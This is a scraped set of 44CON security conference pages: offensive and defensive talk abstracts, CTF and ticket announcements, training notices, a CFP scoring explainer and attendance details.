          Automatic Reverse Compilation & Semantic Comprehension

          Presented By: Christopher Abad

          The machine code to source code problem can be simplified by relaxing the problem constraints and allowing translation from machine code to any reasonably sound higher-level code interpretation instead of expecting a close approximation of the original source code. As a corollary, any solution to the problem also demonstrates semantic comprehension of the machine code. Automatic reverse compilation of machine code to source code and the semantic comprehension of machine code without code execution or emulation can be achieved by combining techniques used in data compression, automatic differentiation, linear algebra, mathematical logic, syntactic analysis and statistical classification. A simplified application of the same tools can be applied to predict pseudo-random numbers and sequences of other mathematical objects.

          Darshak: how to turn your phone into a low cost IMSI catcher device

          Presented By: Ravishankar Borgaonkar & Swapnil Udar

          It is said that 80% of the world’s population now has a mobile phone. They use mobile devices to make calls, send SMS messages and access the internet via the cellular network infrastructure. End-users carrying mobile phones 24 hours a day trust cellular network operators and believe that the provided mobile communication link is secure.

          However, on the other hand, mobile operators, device manufacturers, OS providers and baseband suppliers do little to provide the best security and privacy features to them. In particular, security capabilities of mobile communications are not shown to the end-users. Hence it is easy for malicious attackers to mount subsequent attacks using IMSI catcher equipment. Further, some hidden features, for example ‘silent SMS’, are supported in currently used mobile telephony systems but not notified to the end users when in use. Attackers or illegitimate agencies exploit this weakness to track user movements regularly without the user’s consent.


          Stupid PCIe Tricks

          Presented By: Joe FitzPatrick

          Hardware hacks tend to focus on low-speed (jtag, uart) and external (network, usb) interfaces, and PCI Express is typically neither. After a crash course in PCIe Architecture, we’ll demonstrate a handful of hacks showing how to pull PCIe outside of your system case and add PCIe slots to systems without them, including embedded platforms. We’ll top it off with a demonstration of SLOTSCREAMER, an inexpensive device that’s part of the NSA Playset which we’ve configured to access memory and IO, cross-platform and transparent to the OS – all by design with no 0-day needed. The open hardware and software framework that we will release will expand your Playset with the ability to tinker with DMA attacks to read memory, bypass software and hardware security measures, and directly attack other hardware devices in the system.


          Lessons Learned from Black Hat’s Infrastructure: The Tweets Must Flow

          Presented By: Conan Dooley

          Let’s take a quick trip across the sea to the halls of Black Hat. What made the training network tick? How was it created, who was attacking the network, and how was it defended? How do you keep the wired training network up and reliable when you have nearly two thousand people hammering on it? What tricks kept the wireless running for all those tweets?


          Side Channel attacks in the cloud

          Presented By: Gorka Irazoqui Apecechea

          This presentation exposes isolation vulnerabilities in cloud environments. First we present Bernstein’s attack applied in virtualization environments and show that, for most cryptographic libraries, the attack succeeds in recovering part of the information of an AES key. Second we present an attack that exploits deduplication in cloud settings, which is used to share resources and save memory. We use flush and reload to recover the entire AES key in less than one minute. This work shows that more effort has to be made when designing isolation techniques and cryptographic libraries.


          A Year in Recap: I Am The Cavalry

          Presented By: Beau Woods

          In the face of clear & present threats to Body, Mind & Soul from our accelerating adoption of technology into our society it is clear: The Cavalry Isn’t Coming… it falls to us… the willing & able… and we have to try to have impact. Over the past year, the I Am The Cavalry initiative reduced its focus and increased its momentum. With a focus on public safety & human life we did our best collecting, connecting and collaborating to ensure the safer technology dependence in: Medical, Automotive, Home Electronics & Public Infrastructure.

          This will take place on the Wednesday Evening of 10th September


          I Hunt TR-069 Admins: Pwning ISPs Like a Boss

          Presented By: Shahar Tal

          Residential gateway (/SOHO router) exploitation is a rising trend in the security landscape – every so often do we hear of yet another vulnerable device, with the occasional campaign targeted against specific versions of devices through independent scanning or Shodan dorking. We shine a bright light on TR-069/CWMP, the previously under-researched, de-facto CPE device management protocol, and specifically target ACS (Auto Configuration Server) software, whose pwnage can have devastating effects on critical amounts of users. These servers are, by design, in complete control of entire fleets of consumer premises devices, intended for use by ISPs and Telco providers. Or nation-state adversaries, of course (sorry NSA, we know it was a cool attack vector with the best research-hours-to-mass-pwnage ratio). We investigate several TR-069 ACS platforms, and demonstrate multiple instances of poorly secured deployments, where we could have gained control over hundreds of thousands of devices. During the talk (pending patch availability), we will release exploits to vulnerabilities we discovered in ACS software, including RCEs on several platforms.


          Meterpreter Internals

          Presented By: OJ Reeves

          Everyone has heard of Metasploit, the Open Source exploitation framework, and most have probably come into contact with it on the attacking and/or receiving end. Meterpreter, Metasploit’s most frequently used payload for Windows systems, enables a tester who has gained control of one machine to perform further exploitation, pivoting and penetration with relative ease. But how does Meterpreter work? What goes on ‘under the hood’ when certain commands are executed? How does it avoid touching the disk and survive happily in memory? How does it hide from the operating system, and how could you locate it if it’s running? Let’s dive into the plumbing that makes Meterpreter tick. I will explain in relative detail its lifecycle, along with some of the ins and outs of topics such as Reflective DLL Injection and Migration. Bring your low-level knowledge and interest in technical details as we pop the hood of one of the most loved parts of Metasploit.


          Top 5 Media Fails

          Presented By: Dan Raywood

          It is very easy to criticise the media for getting their facts wrong, for talking to the wrong people and for a lack of knowledge of the more technical terms.

          In this presentation, one of the media’s own will look at the top five (in their opinion) media fails when it comes to security, try and understand why it was incorrect, what the mitigating factors were and ask the important question – are IT security and security journalists even on the same page?


          STOP! Don’t make that NOOB Incident Handling mistake

          Presented By: Steve Armstrong

          In the heat of an incident, when the boss is screaming as to what has happened, when and why, mistakes happen.

          Evidence is lost, compromised systems forgotten and data is not analyzed. During the last 20 years the speaker has fought APT attackers, Russian Cyber Criminals and internal Hacking Administrators. Each of these incidents has been an ‘enhanced experience’ because someone didn’t think just before some routine action was being completed. The result was the delayed closure of an incident, the destruction of evidence, the leaking of counter-hacking strategies to the attackers or just the wrong briefing.

          As developers of Security Operation Centres procedures and Incident Management Teams, we have seen many simple errors wreaking havoc mid incident. To prevent these we developed the Cyber Crisis Planning Room, a web based application to enable Incident Responders to work together and to have the computers doing more of the work. CyberCPR enables management to see progress and to dig into some of the details should they desire.


          When Documents Bite

          Presented By: Vlad Ovtchinikov

          In 1999, the Melissa virus changed the industry’s attitude on how malware could be spread. Seemingly safe formats, such as Microsoft Word and Adobe PDF were now being used to deliver the payload. A recent report on the subject found that malicious documents, as a method for delivering malware, are now the preferred method of delivery amongst attackers. In the Red October Diplomatic Cyber Attacks, Microsoft Office and PDF document files were used as the primary malware delivery vector.

          The primary reason why this attack vector has had such a high rate of success in social engineering attack campaigns is directly linked to its ability to effectively circumvent email and virus filtering solutions. By distributing a ubiquitous file type (such as *.doc, which is considered to be safe and an industry standard in document formats), the attack is in most cases able to reach the intended target.

          An analysis of the real world attack techniques used in malicious documents is key in defending against targeted attacks; attacks that are one of the major IT security concerns for enterprise networks.


          Hacking an Internet Enabled Lagomorph

          Presented By: Alex Chapman

          So, I have to admit, I got a little obsessed with this project. Who would have thought an internet enabled, hyperkinetic, 9.6-inch rabbity thing could hold so much intrigue. Little did I know that in procuring this geek toy I’d be delving down the proverbial rabbit hole of ARM exploitation, including reverse engineering, cross compiling, protocol analysis, 0days and producing exploits from vulnerability advisories. All this in an attempt to get remote code execution… on a rabbit… seriously!

          Throughout this talk I will discuss the processes and procedures used to identify and eventually exploit vulnerabilities on the Karotz “smart companion” (what else would I be talking about?). Vulnerabilities identified include authentication bypass, jump table corruptions and heap overflows which eventually lead to unauthenticated ear wiggling exploits. I wonder if this qualifies for a CVE? A couple of remote code execution bugs will also be discussed.


          Why TV news gets tech security wrong – and why it matters

          Presented By: Geoff White

          Tech security has become such a hot topic that even the most Luddite of TV news editors have been forced to include it in their running orders.

          The results have been a mixed bag, ranging from noble-yet-confusing attempts to convey accurate information, to downright ill-informed sensationalism.

          There are some good reasons why television news struggles with such stories: it’s a medium based on pictures, and technology is a subject chronically deprived of the kind of compelling imagery that makes headlines.

          Yet it’s a challenge with which journalists must engage. Firstly because we have a duty to give the public accurate, timely information about the issues which potentially affect them.

          Secondly, and more importantly for the 44CON audience, the more understanding there is of tech security and the issues around it, the easier it will be to win the boardroom battle for resources to protect individuals, businesses and the wider world from threats.


          Pentesting NoSQL DB’s Using NoSQL Exploitation Framework

          Presented By: Francis Alexander

          The rise of NoSQL databases and their simplicity has meant that corporates as well as end users have started to move towards NoSQL. However, is it safe? Does NoSQL mean we will not have to worry about injection attacks? Yes, we do. This paper concentrates on exploiting NoSQL DBs, especially with its reach towards MongoDB, CouchDB and Redis, and automating it using the NoSQL Exploitation Framework.


          Breaking AV Software

          Presented By: Joxean Koret

          Antivirus software is a common component of today’s computer systems ranging from home users to corporate and government servers. However, security issues related to the AV software itself are not usually considered when deploying such security solutions. Users are not fully conscious of the issues related to using AV software and some AV vendors do not put the required effort in securing their products. In this talk we will cover vulnerability discovery and remote exploitation of AV software. During the talk the details of a number of vulnerabilities will be published. The talk aims to raise the level of awareness about the security of AV software to both users and vendors.


          Bug Bounties – Relationship Advice for the Hunters & the Hunted

          Presented By: Katie Moussouris

          Bug bounties seem like simple enough concepts – put up some money, write up some rules of engagement, and off you go into the sunset hand in hand with hackers who love you all of a sudden. Except like all relationships, the ones forged between those offering a bug bounty and those looking to help them by reporting bugs and getting paid require some work to maintain. Join Katie Moussouris as she leads you on a brief relationship counseling session on bounties with tips on how to structure them, and how to reap the rewards from them, in ways that leave both parties feeling like they benefitted from the interaction.


          #####EOF##### 44CON News – 44CON

          CTF 2017

          This year we are delighted to announce that Immersive Labs will be running the 44CON 2017 CTF and they have some great challenges in store for you! Make sure you stop by and see them. 

          They will make their platform available to all 44CON participants, enabling you to take on over 150 cyber security challenges during the conference. Immersive Labs exercises combine both CTF style and sign-posted challenges ranging from Beginner to Advanced. 

          A real-time leaderboard will keep track of participants including the individual labs they’ve completed. Immersive Labs will be providing opportunities for the top 10 users to become “Immersive Original” lab producers which attract a £1000 payment for each lab.

           

           

          CTF

          This year we are delighted to announce that the Ministry of Justice will be running the CTF and they have some great challenges in store for you! Make sure you stop by and see them. 

          Prison break – Season 6 coming soon!

          Do you have what it takes to break into prison?

          This year the 44CON CTF is being hosted by the Ministry of Justice. Your challenge is to release your friend by “breaking in” to prison through a series of networking, web, infrastructure and other challenges.

          We will host up to 20 teams of up to 5 people so, if you’re new, grab someone, team up or go solo to win a drone kit!

          Our platform is over IRC to make this accessible to as many hackers as possible. This is where you submit flags and unlock rooms. Each team will have their own virtual environment so you can use whichever tools you want but, remember, you can only bring your machine down if you play unfair. No DoSing us or other teams!

          Are you ready for the challenge?

          Tickets for 44CON 2016 are on sale

          44CON 2016 tickets are now on sale in our shop, so go and get yours now!

          We also have 4 great training courses by Saumil Shah, Dawid Czagan, Joe FitzPatrick, Dominic Chell and Marcus Pinto. Go check them out and book your place early to avoid disappointment, as courses will be cancelled if minimum numbers are not reached 3 weeks before the conference.

          44CON is the UK’s premier annual technical security conference and training event. 44CON 2016 will be taking place from the evening of the 14th September until the 16th September at the ILEC Conference Centre. You can expect a jam-packed few days of awesome talks, food and, of course, alcohol.

          Our CFP closes tonight (Friday 10th June) so if you have something awesome to share get it in now before it’s too late.

          Finally, check this great day out at the Farnborough International Air Show from our friends at Suits & Spooks on 14th July, Counterespionage: the need for speed, and use the code 44CON for a 5% discount on both package options.

          Dawid Czagan’s training course is still going ahead

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, on the 27th and 28th April 2016. It will take place at the ILEC Conference Centre.

          Do check it out!

          44CON Cyber Security 2016 Cancelled

          Unfortunately we’ve had some problems with the 44CON Cyber Security event that we just couldn’t overcome. Some of these issues were small, like crew numbers, while others such as unexpected price hikes for us were simply insurmountable without breaking the cost model. Furthermore, the presence of so many great events in the UK from BSides London and Manchester, through to Securitay meant that a separate event was becoming harder to justify in an already busy calendar.

          When we started 44CON Cyber Security last year, we set out to create an exhibition for the Infosec community without the infosuck. We wanted to create an event that was free (or at least super cheap), that was different to 44CON London but had its spirit (if not its Gin) and a place where people more involved in end-user business security functions could come together without the fear of heavy-handed barcode scanning. We believe we mostly succeeded, but only as a result of the enormous effort our crew of volunteers put in and Adrian’s hard work.

          Unfortunately this year both Adrian and Steve have had less time to work on 44CON Cyber Security, and with fewer volunteers able to plug the gaps, we felt that if we couldn’t deliver an event on par with last year that perhaps it would be better to focus on making 44CON London an even better event, which is what we’re going to do.

          We’ll be in touch with everyone with a ticket for 44CON Cyber Security to let them know that it’s not going ahead, and to give them the option of a full refund or discounted entry to 44CON London, and of course to apologise for any inconvenience. But it’s not all bad news…

          Traditionally, 44CON London has had an Infosec track and a technical track. Last year had no Infosec track because of 44CON Cyber Security. This year, the Infosec track will be back with a vengeance.

          It’s going to be awesome.

          If you have any questions, please email 44con@44con.com, and we’ll do our best.

          Adrian & Steve

          44CON Cyber Security Keynote Speaker Announced!


          We here at 44CON are delighted to announce that David Davis MP will be the Keynote Speaker at this year’s 44CON Cyber Security.

          David has been an elected MP since 1997, and since 2008 he has been a leading figure on the Conservative back benches. David is best known for being a strong defender of our civil liberties, but his considerable experience in ministerial and public posts means he is a respected speaker and commentator on Europe and the Eurozone crisis, banking, security, education and social mobility. David is one of the best known politicians in Britain and frequently appears locally and nationally on television and in the press. We cannot wait to welcome him to 44CON Cyber Security 2016.

          44CON Cyber Security 2016 will take place on Tuesday 26th April at the ILEC Conference Centre, London. To get your ticket please visit our shop. 

          44CON Cyber Security 2016 Speakers

          We here at 44CON are delighted to announce the first three speakers to present at 44CON Cyber Security this year:

          • Meaningful Measurement: It’s About Time We Got This Right, Presented by Ian Trump
          • What it means to have the C word in the National Security agenda, Presented by Emil Tan
          • Data protection, privacy and cloud computing: navigating legal compliance, Presented by Graham McKay

          More speakers will be announced soon so keep a look out here and on our twitter page @44CON

          44CON Cyber Security will take place on Tuesday 26th April 2016 at the ILEC Conference Centre London. For tickets please visit our shop. This year for each ticket sold a £5.00 donation will be made to Barnardo’s.

           

          Training course at 44CON Cyber Security 2016

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan‘s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, which we will be running after 44CON Cyber Security 2016, on the 27th and 28th April 2016. It will hopefully take place at the same venue as the conference.

          Do check it out!

          #####EOF##### CREST – 44CON

          CREST

          CREST is the not-for-profit accreditation and certification body that represents and supports the technical information security market.

          CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services. All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected Executive of experienced security professionals who also promote and develop awareness, ethics and standards within the cyber security market.

          CREST also supports the industry by providing in-depth guidance material and commissioning detailed research projects. All CREST research is provided to the industry free of charge and is available from the CREST website.

          Visit our website for more information on CREST membership and examinations, to find an accredited service provider or to download our research: www.crest-approved.org

          Follow us on Twitter: @crestadvocate

          #####EOF##### 44CON Talks and Workshops announced – 44CON

          44CON Talks and Workshops announced

          Our CFP process has completed and we’re now putting talks and workshops up. We still have a few more to add, but there’s enough up to start checking out. So, what are we covering this year? This year’s talks are a heady mix of blue, red and purple team talks covering everything from bug bounties to hardware hacking, careers to cryptography and machine learning to mPoS. As always, expect to go from zero to hero, and get yer mind bent along the way. Here are some of the talks we’re really looking forward to seeing.

          [NEW] They’re All Scorpions – Successful SecOps in a Hostile Workplace by Pete Herzog

          This talk looks at how we can shift our approach to SecOps to be (more) effective in places where it feels like nobody’s listening. Pete is a battle-scarred veteran of the world of information security, and doesn’t shy away from asking (and answering) the difficult questions.

          [NEW] Catch Me If You Can: Ephemeral Vulnerabilities in Bug Bounties by Shubham Shah and Michael Gianarakis

          Bug bounties are an industry hot topic, with many people finding it hard to get in due to automation. Shubs and Mike are coming all the way from Australia to talk to us about ephemeral vulnerabilities: vulnerabilities that may pop up and disappear after short periods of time. They’ll share their secrets on industrializing bug bounty hunting, and we’ve been working with our sponsors Bugcrowd to come up with a 44CON-exclusive bug bounty to help you get started. This is a great talk for those looking to get into bug bounties, and also for those defending Internet-facing services with dynamically scaling architectures. This talk may feature some of the 300 bugs these guys have found over the past few years, but sadly it would not be possible to fit them all into a 45 minute slot.

          [UPDATED] For the Love of Money: Finding and exploiting vulnerabilities in mobile point of sales systems by Leigh-Anne Galloway and Tim Yunusov

          Ever make a payment using a mobile Point of Sale (mPoS) system such as Square or iZettle? You know, the ones with the things that plug into some random person’s compromised phone that you use to make payments.

          It turns out that some mPoS systems are not as secure as people thought they were.

          It turns out that attacking some of these things isn’t hard.

          It turns out that the cost of tampering with some of these things is about £8.

          What could possibly go wrong?

          [NEW] Weak analogies make poor realities – are we sitting on a Security Debt Crisis? By Charl van der Walt

          Security is often framed in terms of risk, and we often back up our decisions with analogies. But are we genuinely using analogies correctly, or are we simply cherry picking to justify risk decisions? In this talk, Charl looks at our approach to analogies and risk management, and explores and compares the use of security debt as a decision-making tool.

          Charl also has an incredible workshop on deploying Microsoft’s Sysmon to help detect and defend against bad things on your networks. In itself, this is a great example of using security debt as a way of measuring investment in existing tools and people over buying new shiny boxes.

          Tickets are still available from our shop. Which talks and workshops are you looking forward to? Don’t forget to let us know on twitter!

          #####EOF##### TNMOC – 44CON

          TNMOC Guided Tour Giveaway

          Proudly sponsored by F-Secure

          Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

          F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.

          The tour will last around 2 hours and cover the full museum collection, from Colossus and the wartime code-breaking machines through the history of computing from 1940 to the start of the smartphone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

          After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

          How to enter:

          1. Sign up to our newsletter
          2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
          3. Keep an eye on your emails in mid August to see if you’re a winner

          Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

          Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

           

          #####EOF##### SteelCon2018 Tickets up for Grabs! – 44CON

          SteelCon2018 Tickets up for Grabs!

          Ey up, We’ve got two SteelCon 2018 Tickets to give away. Make like a whippet and you too could be at Sheffield’s finest hacker conference!

          Nah then, 44CON will be exhibiting at SteelCon in July 2018. We’re also running a soldering area and have stickers and reyt good goodies to grab! Even better, we have two tickets to give away! As lovely as it is, Sheffield is uphill both ways in the snow. If you’re heading up from that London, make sure you wrap up warm.

          How to enter:

          For a chance to win one of two SteelCon 2018 tickets all you have to do is this before the 31st of May 2018:

          1. Purchase a 44CON 2018 ticket
          2. Make sure you’re signed up to the 44CON mailing list (you can do this by ticking the relevant box when purchasing your ticket or here).

          Obligatory fine print:

          Don’t stress love, if you’ve already bought a ticket and are signed up to our mailing list using the same email address for both, you’re already in the draw.
          Winners will be contacted around the 4th of June 2018. If you would rather someone else had your SteelCon 2018 ticket just let us know and we’ll make it happen.
          Marizel is running the draw, and her decision is final. She cannot be bribed with crisps, breadcakes, nor flat caps, although you’re welcome to try.

          We’d love to see you at SteelCon!

          If you’re planning to attend SteelCon 2018 please come over and say hi. We’ll be the ones selling 44CON tickets, sticking things to people and soldering to our <3’s content. The SteelCon team have two 44CON 2018 tickets to give away, so look out for a chance to win these too.

          #####EOF##### IISSP – 44CON

          IISSP

          The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole. The IISP does this through accrediting skills and competence, by sharing best practice and by providing a network of support and guidance on individual skill development. It speaks with an authoritative voice and its competency based memberships are widely recognised in the information security industry.

          Working closely with the Information Security community, the IISP has a growing membership of over 2,600 individual members across private and government sectors, forty two Corporate Member Organisations and seventeen Academic Partners.

          At the heart of the Institute is the IISP Skills Framework©2012, which is widely accepted as the de facto standard for measuring competency of Information Security Professionals. CESG have taken this framework to underpin a range of certification schemes, including the Certified Professional Scheme (CCP), for which the IISP is the leading certifying body, and to develop syllabuses for Masters Degrees. The skills framework is used extensively by our corporate members to benchmark and develop capability of their employees; it has also been adopted by e-Skills UK to develop a National Occupational Standard for Information Security. The IISP also accredits training courses offered by commercial training providers against the Institute’s Skills Framework. This enables attendees to build knowledge in areas of the skills framework where they might have gaps and to gain hands-on experience.

          More information about the IISP and its work can be found at www.iisp.org.

          #####EOF##### steelcon – 44CON

          Steelcon Ticket winners

          44CON Soldering Area at Steelcon

          Steelcon is coming up soon, and Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands-on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

          We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

          And the winners are…

          After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

          We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

           

           

           

          #####EOF##### 44CON Training – 44CON

          44CON Training Goes Quarterly

          We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused courses on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

          That’s right, you no longer have to wait a year to sit a high quality training course!

          Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

          Mastering Container Security – Rory McCune, NCC Group
          Malware Reverse Engineering – Joxean Koret

          Both courses are two days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

          If you’d like to offer a high-end course in London, get in touch.

          #####EOF##### How to game the 44CON CFP – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5. What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list; however, sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first served basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get fewer than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, think of it this way: if your main talk is about the theory, try a play-along walkthrough of how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit that separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          #####EOF##### Attending – 44CON

          Attending

          Our next event is 44CON 2019 on 11th, 12th & 13th of September 2019. It will take place at the ILEC Conference Centre, London and will kick off on Wednesday 11th September at 6:30pm with our Community Evening. Registration will start at 6pm.

          Entry is free on Wednesday evening but you will have to register beforehand (details closer to the event).

          Press registration is handled separately to normal attendance registration. Please see here for more info.

          Mark your calendars:

          Next 44CON Conferences will take place:

          • 2019: 11th, 12th & 13th of September 2019
          • 2020: 9th, 10th & 11th of September 2020

          In the spirit of making 44CON safe and enjoyable for everyone, please ensure you adhere to our house rules at all times at and around the event.

          More information will be added to this page as it becomes available so please check it regularly. You can also keep a look out on our Twitter page @44CON or sign up to our mailing list where you will be the first to know about all things 44CON.

